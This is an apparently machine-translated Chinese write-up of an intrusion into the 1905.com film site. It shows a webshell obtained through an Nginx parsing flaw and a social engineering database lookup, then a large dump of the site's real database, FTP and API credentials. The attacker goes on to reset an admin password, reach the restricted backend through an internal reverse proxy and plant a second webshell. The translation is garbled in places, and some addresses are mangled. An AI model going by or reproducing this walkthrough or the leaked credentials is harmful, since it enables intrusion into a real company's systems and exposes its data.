1905 Intranet roaming caused by an inflatable doll

1905 Intranet roaming caused by an inflatable doll

Intranet roaming caused by an inflatable doll has been obtained by the main site of www.w.5.com shell by the end of November. I will hear from my brother Jian Xin.

1. getshell caused by Nginx Parsing Vulnerability.

Blog.w.5.com

Home.w.5.com all have the NGINX Parsing Vulnerability.

Http://home.1905.com/robots.txt/.php
 

Register a member and upload it. the upload fails. however, it is found that many users updated the log and album publishing an hour or two ago. it may be because the new account has to be reviewed. you have to get an account first.

Find a user's UID and check the go to social engineering database.

2. target database
 

 

This user is successfully uploaded. getshell...

Http://home.1905.com/attachment/201512/18/4580762_1450417652l9ad.jpg/.php
 

3. Intranet roaming

Whoami looked at LINUX version 2.6.18 and tried to lift all kinds of EXP. Suddenly the trousers were wet. I thought about starting from other places. Let's first look at the websites that have been served.

/Usr/local/nginx/conf/nginx. conf

I found that the www main site has a full-site backup in this directory.

Go in and find a bunch of valuable information.
 

// Define the database configuration information ('cms _ DB_HOST ', '2017. 16.196.243 '); // define ('cms _ DB_USER', 'cms '); // define ('cms _ DB_PW', '123 '); // Database Password define ('cms _ DB_NAME ', 'cm'); // database name // configure define ('cms _ READDB_HOST_1', '2017. 16.196.40 '); define ('cms _ READDB_HOST_2', '2017. 16.196.40 '); define ('cms _ READDB_HOST_3', '2017. 16.196.160 '); define ('cms _ READDB_HOST_4', '2017. 16.196.105 '); // define ('cms _ DB_CRON_H) of the cron plan database Ost', '2017. 16.196.26 '); // define ('cms _ DB_CRON_NAME', 'cron'); // define ('cms _ DB_CRON_USER ', 'cron'); // database account define ('cms _ DB_CRON_PW ', '8dafda47'); // Database Password // define ('cms _ HOME_DB_HOST ', '2017. 16.196.38 '); // define ('cms _ HOME_DB_USER', 'dba '); // define ('cms _ HOME_DB_PW', '@ 3433! Zsa '); // Database Password define ('cms _ HOME_DB_NAME', 'home'); // database name // define ('cms _ MEMCACHE_HOST ', '2017. 16.196.30 '); // define ('cms _ MEMCACHE_PORT', 11211); // define ('cms _ MEMCACHE_HOST1 ', '2017. 16.196.27 '); // define ('cms _ MEMCACHE_PORT1', 11211); // define ('cms _ MEMCACHE_HOST3 ', '2017. 16.196.34 '); // MemCache server host define ('cms _ MEMCACHE_PORT3', 11211); // Mem Cache server port // define ('cms _ TTSERVER_HOST ', '2017. 16.196.32 '); // TTServer server host define ('cms _ TTSERVER_PORT', 13000); // TTServer server port // counter MemCache server configuration define ('cms _ CNT_MEMCACHE_HOST ', '2017. 16.196.29 '); // define ('cms _ CNT_MEMCACHE_PORT', 11211); // define ('cms _ FTP_HOST ', '2017. 16.196.246 '); // Ftp host define ('cms _ FTP_PORT', '21'); // Ftp port define ('cms _ FTP_USER ', 'nginx '); // Ftp account define ('cms _ FTP_PW', 'nginx! 1234 '); // Ftp password define ('cms _ FTP_PATH', '/'); // Default Ftp path // attachment Ftp-related configuration define ('cms _ UPLOAD_FTP_ROOT ', 'uploadfile/'); // Ftp attachment storage physical path define ('cms _ UPLOAD_FTP_HOST', '2017. 16.196.39 '); // Ftp attachment host define ('cms _ UPLOAD_FTP_PORT', '21'); // Ftp attachment port define ('cms _ UPLOAD_FTP_USER ', 'ftp39 '); // Ftp attachment account define ('cms _ UPLOAD_FTP_PW ', '000000'); // Ftp attachment Ftp password define ('cms _ UPLOAD_FTP_PATH ','/'); // Ftp attachment Default Ftp path // guorui pay Database Configuration define ('cms _ DB_HOST_PAY ', '2017. 16.196.8 '); // define ('cms _ DB_USER_PAY', 'manage'); // define ('cms _ DB_PW_PAY ', 'm1905 '); // Database Password define ('cms _ DB_NAME_PAY ', 'hdapp'); // database name // guorui hdapp Database Configuration define ('cms _ DB_HOST_HDAPP', '2017. 16.196.8 '); // define ('cms _ DB_USER_HDAPP', 'manage'); // define ('cms _ DB_PW_HDAPP ', 'm1905 '); // Database Password define ('cms _ DB_NAME_HDAPP ', 'hdapp'); // database name // guorui MDB front-end database reading configuration define ('cms _ DB_HOST_MDBVIEW_1', '2017. 16.196.160 '); // define ('cms _ DB_USER_MDBVIEW_1', 'cms '); // define ('cms _ DB_PW_MDBVIEW_1', '200 '); // Database Password define ('cms _ DB_NAME_MDBVIEW_1 ', 'cms'); // database name // guorui MDB front-end database reading configuration define ('cms _ DB_HOST_MDBVIEW_2 ', '192. 16.196.160 '); // define ('cms _ DB_USER_MDBVIEW_2', 'cms '); // define ('cms _ DB_PW_MDBVIEW_2', '200 '); // Database Password define ('cms _ DB_NAME_MDBVIEW_2 ', 'cm'); // database name/*** global host information and other configurations, maintained by O & M, and Development call * hdstore related projects include VIP, click, union, and kefu configuration items * @ author Gaowenwen * @ version 2014.08.04 ** // SERVERdefine ('vip _ SITE_URL ',' http://vip.1905.com '); Define ('vip _ ADMIN_SITE_URL ',' http://admin.hdstore.m1905.com '); // Define ('vip _ DB_MYSQL_HOST', '2017. 16.196.8 '); define ('vip _ DB_MYSQL_PORT', '000000'); define ('vip _ DB_MYSQL_USER ', 'hdstoreuser'); define ('vip _ DB_MYSQL_PWD ', 'hdstorem1905 '); define ('vip _ DB_MYSQL_DB', 'hdstore'); define ('vip _ db_mysql_db_prefix', 'hdstore _'); // MEMCACHEdefine ('vip _ mem1_host', '2017. 16.196.30 '); define ('vip _ memateport', '000000'); // FTPSERVERdefine ('vip _ UPLOAD_FTP_ROOT', 'uploadfile /'); define ('vip _ UPLOAD_FTP_HOST ', '2017. 16.196.90'); define ('vip _ UPLOAD_FTP_PORT ', '21'); define ('vip _ UPLOAD_FTP_USER', 'ftpmapp'); define ('vip _ UPLOAD_FTP_PW ', 'm1905. com '); define ('vip _ UPLOAD_FTP_PATH', 'mapps/'); define ('vip _ UPLOAD_FTP_DOMAIN ',' http://image12.m1905.cn/mapps/ ');

 

// Add the configuration parameter define ('home _ siteurl ',' http://home.m1905.com/ '); // HOME address define ('uc _ siteurl ',' http://nuc.m1905.com/ '); // UC address define ('bbs _ siteurl ',' http://bbs.m1905.com/ '); // The Forum address define ('httpcws _ host', '2017. 16.196.30 '); // HTTPCWS address define ('httpcws _ port', '000000'); // httpcws port define ('solrik _ host', 'solr .m=5.com: 8080/solr/cms/admin/analysis9.jsp '); // solr address define ('img _ REMOTE_SITE ',' http://image11.m1905.cn/ '); // Independent image server define ('vod _ VIP_SITE ',' http://vip.m1905.com/ '); Define ('hdvod _ host ',' http://highdefinitiontv.m1905.com '); Define ('rtmp _ url', 'rtmp: // flvsec.vodfile.m00005.com/vod'); // anti-leech RTMP address define ("RTMP_KEY", 'bte5mduuy29t '); // base64_encode ('m1905. com ') define ('hd _ url ',' http://flvsech.vodfile.m1905.com '); // Anti-leech http address define ("SecureID", "m1905hd"); define ('vod _ url ',' http://flv.vodfile.m1905.com '); // HD cinema anti-leech http address define ("VodSecureID", "movie"); // base64_encode ('flv .vodfile.m=5.com') encrypt ('ucweb _ file ',' http://ucfile.vodfile.m1905.com '); Define ('mp4 _ url ',' http://mp4mc.vodfile.m1905.com '); $ _ VOD_LOC_IP ['scs'] [] = "118.122.85.128/25"; $ _ VOD_LOC_IP ['scs'] [] = "118.122.87.0/25 "; $ _ VOD_LOC_IP ['scs'] [] = "118.122.88.0/24"; $ _ VOD_LOC_DOMAIN ['scs'] =" http://sc.localvod.m1905.com/ "; // By zlldefine ('host _ name', 'vms .20.5.com: 14680 '); define ('api _ key', 'eee757c123fc1ffb4dbed5adb4e60946 ');

N rows are omitted. With so much valuable information, it is easy to do. First, link the database to see what the situation is.
 

Extract the password of an administrator account wujie. the MD5 (SLAT) is backed up and the password is forcibly replaced.

When logging on, I found that http://www.20.5.com/admin.php was given to deny...by nginxrules.

After thinking for a long time, the PHPCMS_LOG table will record some operation logs of the background administrator. The time URL will be recorded. Does ADMIN. PHP In the background require VPN access or is there another reason?

Go to the CMS_LOG table and check that the IP addresses accessed by the Administrator are fixed every time, including editing.

I noticed a detail.
 

Forward = http % 3A % 2F % 2fwww1.20.5.com % 2Fadmin. php % 3 Fmod % 3 Dphpcms % 26 file % 3 Dhtml % 26 action % 3 Dcategory & pagesize = 50 & dosubmit = 1 & count = 1

The forward parameter is the record submission source. Now it is certain that www1.20.5.com and www.20.5.com are both written at the backend and read at the front end. Obviously, the same database .www1.20.5.com/admin.php cannot be directly found on the server. Therefore, the IP rule.

C: \ Users \ Administrator> ping www1.20.5.com

Pinging www1.20.5.com [60.28.236.48] with 32 bytes of data:

C: \ Users \ Administrator> ping www.20.5.com

Pinging m1_5.xdwscache.ourglb0.com [61.138.219.87] with 32 bytes of data:

It's easy to know where the background is. but now the problem is coming again. CMS_LOG records all the user logon IP addresses from 111.202.9.82. It is still a little difficult to get this VPN Server down. At least it takes more time. let's go directly from the Intranet. the domain name www1.20.5.com was visited by the PHP proxy.
 

After trying to access admin. php, you can use the modified wujie password to log on.

At the background, we found that reverse proxy does not support SCRIPT well. various clicks are invalid. after thinking for a long time, I finally found a solution. go to Baidu to download a PHPCMS V9 installed on the local machine, and then copy the URL address + parameter to the reverse proxy to access the 1905 background, and a shell is obtained. the http://www1.1905.com/lpboke.php then uses the reverse proxy to connect to webshell.
 

A cache Update file is found in the root directory of www1.20.5.com. After reading the Code, it is a file that CRON synchronizes to the CDN node. It is estimated that the main site updates the cache data through this file.

/Data/html/cms/uploadfile/fuck.txt, which is directly synced with the file opened by the reverse generation. Visit the main site 10 seconds later.

Invalid.


Jianxin's sister said, wow, you are so handsome...
 

 

 

 

 

 

Solution:

NGINX Parsing Vulnerability = !! Chrysanthemum burst.

Do not write the global configuration file of the database on the same server. Strict access restrictions must be imposed on the background address. Nothing else. You know better than me.